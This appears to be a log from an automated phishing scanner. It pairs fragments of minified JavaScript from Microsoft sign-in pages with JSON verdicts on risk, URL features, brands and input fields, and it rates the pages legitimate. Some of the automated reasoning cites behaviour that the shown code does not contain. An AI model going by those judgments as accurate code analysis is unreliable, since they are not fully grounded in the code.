7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The code is also accompanied by a third-party notice, indicating it is likely part of a larger, well-documented project. While the script uses some legacy practices like `XDomainRequest`, these pose only minor risks and are not inherently malicious. Overall, the snippet seems to be a benign implementation of a standard web API, with no clear signs of malicious intent."
}

/*!
 * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
 * 
 * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
 * 
 *   json2.js (2016-05-01)
 *   https://github.com/douglascrockford/JSON-js
 *   License: Public Domain
 * 
 * Provided for Informational Purposes Only
 * 
 * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
 */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t,n){var 

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://login.microsoftonline.com

{
  "contains_trigger_text": true,
  "trigger_text": "Sign in",
  "prominent_button_name": "Next",
  "text_input_field_labels": [
    "Email, phone, or Skype"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

```json
{
    "risk_score": 3,
    "reasoning": "The script uses aggressive DOM manipulation and external data transmission without transparency, but it interacts with a trusted domain (Microsoft) and appears to be part of a legitimate application, likely for customization or configuration purposes."
}

/*!
 * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
 * 
 * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
 * 
 *   json2.js (2016-05-01)
 *   https://github.com/douglascrockford/JSON-js
 *   License: Public Domain
 * 
 * Provided for Informational Purposes Only
 * 
 * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
 */
(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(539).concat([function(t,e,r){var n=r(2),o=r(22),i=r(0),s=r(5),u=r(1018),a=r(3).Array,c=i.StringCustomizationPageId;t.exports=function(t){var e=this,r=t.serverData,f=t.pageId;function l(t){return function(t){var e=0,n=r.slMaxRetry||0;if(!t)return s.reject();return new s((function(r,s){var u={targetUrl:t,contentType:i.ContentType.Json,requestType:o.RequestType.Get,timeout:3e4,successCallback:function(t,e){r(e)},failureCallback:function(t){e<n?(e+=1,new o.Handler(u).sendRequest()):s(t)}};new o.Handler(u).sendRequest()}))}(t).then((function(t){return JSON.parse(t)}),(function(){e.strings.isLoadFailure(!0)}))}e.customCssLoader=new u,e.strings=n.observable({}),e.strings.isLoadComplete=n.observable(!1),e.strings.isLoadFailure=n.observable(!1),e.isLoadComplete=n.observable(!1),e.isLoadFailure=n.observable(!1),e.initialize=function(){},e.load=function(t){var r,n=[],o=[];return t.customStringsFiles&&function(t,r){var n=[];switch(f){case c.ConditionalAccess:t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.AttributeCollection:t.attributeCollection&&n.push(t.attributeCollection);break;case c.ProofUpPage:t.authenticatorNudgeScreen&&n.push(t.authenticatorNudgeScreen),t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.ErrorPage:t.adminConsent&&n.push(t.adminConsent),t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.LoginPage:t.attributeCollection&&n.push(t.attributeCollection);break;case c.MessagePage:}var o=n.length;if(o)for(var i=0;i<o;i++)r.push(l(n[i]));else e.strings.isLoadComplete(!0)}(t.customStringsFiles,o),t.customCss&&n.push((r=t.customCss,e.customCssLoader.loadAsync(r))),s.allSettled(o).then((function(t){var r=[];a.forEach(t,(function(t){t&&"fulfilled"===t.status&&t.value&&(r=r.concat(t.value))})),e.strings(r),e.strings.isLoadComplete(!0)})),s.allSettled(n.concat(o)).then((function(){e.isLoadComplete(!0)})),s.all(n)["catch"]((function(t){throw e.isLoadFailure(!0),t}))}}},,,function(t,e,r){"use strict";var n=r(545),o=r(570).f,i=r(571),s=r(561),u=r(742),a=r(635),c=r(637);t.exports=function(t,e){var r,f,l,h,p,d=t.target,y=t.global,v=t.stat;if(r=y?n:v?n[d]||u(d,{}):n[d]&&n[d].prototype)for(f in e){if(h=e[f],l=t.dontCallGetSet?(p=o(r,f))&&p.value:r[f],!c(y?f:d+(v?".":"#")+f,t.forced)&&l!==undefined){if(typeof h==typeof l)continue;a(h,l)}(t.sham||l&&l.sham)&&i(h,"sham",!0),s(r,f,h,t)}}},function(t,e,r){"use strict";t.exports=function(t){try{return!!t()}catch(e){return!0}}},function(t,e,r){"use strict";var n=r(633),o=Function.prototype,i=o.call,s=n&&o.bind.bind(i,i);t.exports=n?s:function(t){return function(){return i.apply(t,arguments)}}},function(t,e,r){"use strict";(function(e){var r=function(t){return t&&t.Math===Math&&t};t.exports=r("object"==typeof globalThis&&globalThis)||r("object"==typeof window&&window)||r("object"==typeof self&&self)||r("object"==typeof e&&e)||r("object"==typeof this&&this)||function(){return this}()||Function("return this")()}).call(this,r(40))},function(t,e,r){"use strict";var n=r(543);t.exports=!n((function(){

{
  "brands": [
    "Microsoft"
  ]
}

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The code is well-documented and licensed under the public domain, indicating it is likely a trusted and widely-used library. Overall, this script poses a low risk and is likely used for legitimate purposes."
}

/*!
 * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
 * 
 * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
 * 
 *   json2.js (2016-05-01)
 *   https://github.com/douglascrockford/JSON-js
 *   License: Public Domain
 * 
 * Provided for Informational Purposes Only
 * 
 * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
 */!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)i=o[s],Object.prototype.hasOwnProperty.call(a,i)&&a[i]&&c.push(a[i][0]),a[i]=0;for(t in r)Object.prototype.hasOwnProperty.call(r,t)&&(e[t]=r[t]);for(d&&d(n);c.length;)c.shift()()}var t,i={},a={24:0};function o(n){if(i[n])return i[n].exports;var t=i[n]={i:n,l:!1,exports:{}};return e[n].call(t.exports,t,t.exports,o),t.l=!0,t.exports}Function.prototype.bind||(t=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var n=t.call(arguments,1),i=n.length,a=this,o=function(){},r=function(){return n.length=i,n.push.apply(n,arguments),a.apply(o.prototype.isPrototypeOf(this)?this:e,n)};return this.prototype&&(o.prototype=this.prototype),r.prototype=new o,r}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(n){var t=this,i=0,a=null,o=[];function r(){if(o.length>0){var e=o.slice();o=[],setTimeout((function(){for(var n=0,t=e.length;n<t;++n)e[n]()}),0)}}function s(e){0===i&&(a=e,i=1,r())}function c(e){0===i&&(a=e,i=2,r())}t.then=function(n,t){return new e((function(s,c){!function(n,t,s,c){o.push((function(){var o;try{o=1===i?"function"==typeof n?n(a):a:"function"==typeof t?t(a):a}catch(r){return void c(r)}o instanceof e?o.then(s,c):2===i&&"function"!=typeof t?c(o):s(o)})),0!==i&&r()}(n,t,s,c)}))},t["catch"]=function(e){return t.then(null,e)},function(){if("function"!=typeof n)throw new TypeError("Promise: argument is not a Function object");try{n(s,c)}catch(e){c(e)}}()}function n(e,n,t,i,a){return function(o){e[n]=i?o:a?{status:"fulfilled",value:o}:{status:"rejected",reason:o},t()}}function t(t,i){return t&&t.length?new e((function(a,o){for(var r=[],s=0,c=0,d=t.length;c<d;++c){var l=t[c];if(l instanceof e){s++;var u=function(){0==--s&&a(r)};i?l.then(n(r,c,u,i),o):l.then(n(r,c,u,i,!0),n(r,c,u,i,!1))}else r[c]=l}0===s&&setTimeout((function(){a(r)}),0)})):e.resolve([])}function i(e,n){return function(){e(n)}}e.all=function(e){return t(e,!0)},e.allSettled=function(e){return t(e,!1)},e.race=function(n){return new e((function(t,a){if(n&&n.length)for(var o=0,r=n.length;o<r;++o){var s=n[o];s instanceof e?s.then(t,a):setTimeout(i(t,s),0)}}))},e.reject=function(n){return new e((function(e,t){t(n)}))},e.resolve=function(n){return n instanceof e?n:n&&"function"==typeof n.then?new e((function(e,t){n.then(e,t)})):new e((function(e){e(n)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),o.e=function(e){var n=[],t=a[e];if(0!==t)if(t)n.push(t[2]);else{var i=new Promise((function(n,i){t=a[e]=[n,i]}));n.push(t[2]=i);var r=window.ServerData,s=r&&r.loader&&r.loader.cdnRoots||[],c=r&&r.slMaxRetry?r.slMaxRetry:s.length-1,d=new Error;var l=function u(n,t){var

{
  "contains_trigger_text": true,
  "trigger_text": "Taking you to your organization's sign-in page",
  "prominent_button_name": "Cancel",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": [
    "Password",
    "Sign in with PIN or smartcard"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://msft.sts.microsoft.com

{
  "brands": [
    "Microsoft"
  ]
}

{
  "brands": [
    "Microsoft"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and globally recognized.",    "The URL 'msft.sts.microsoft.com' is a subdomain of 'microsoft.com', which is the legitimate domain for Microsoft.",    "The use of 'msft' is a common abbreviation for Microsoft and is not suspicious in this context.",    "The presence of input fields like 'Password' and 'Sign in with PIN or smartcard' is typical for a Microsoft login page."  ],  "riskscore": 1}

URL: msft.sts.microsoft.com
			Brands: Microsoft
			Input Fields: Password, Sign in with PIN or smartcard